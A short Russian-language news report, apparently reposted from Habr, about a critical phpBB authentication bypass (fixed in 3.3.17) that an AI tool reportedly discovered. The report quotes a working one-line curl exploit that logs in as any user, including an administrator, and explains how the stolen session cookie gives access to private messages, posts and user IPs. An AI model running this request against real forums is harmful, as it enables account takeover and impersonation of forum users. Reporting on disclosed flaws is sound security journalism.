Компания Aikido Security, работающая в сфере кибербезопасности, сообщила о критической уязвимости в phpBB — популярном движке интернет-форумов.
Уязвимость, выявленная ИИ-утилитой Aikido Attack, позволяет полностью пропустить процесс авторизации и войти на форум под учётной записью любого пользователя, включая администратора.
Подробности пока не раскрываются, несмотря на то, что исправление выпущено ещё 6 июня. Уязвимы все версии phpBB вплоть до 3.3.17, в которой проблема и была устранена. Владельцам крупных форумов отправлены оповещения.
Портал OpenNET приводит пример рабочего эксплоита:
curl -i -s \ -c cookies.txt \ -b cookies.txt \ -u 'admin:anything' \ -d 'login=Login&login_username=admin&login_password=anything' \ 'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'
Эксплуатация сводится к отправке одного HTTP-запроса с указанием логина жертвы. В файле cookies.txt окажется сессионная кука, которую злоумышленник подставит в свой браузер.
С правами обычного пользователя атакующий может читать личные сообщения пользователя и отправлять посты от имени жертвы. С учётной записью администратора возможности гораздо шире: можно править и удалять чужие посты, удалять учётные записи, а также видеть IP-адреса пользователей. Тем не менее, атакующий не сможет зайти в панель администрирования (чтобы, например, удалённо выполнить произвольный код на сервере), поскольку для этого потребуется ввести пароль, которого он не знает.
ссылка на оригинал статьи https://habr.com/ru/articles/1046724/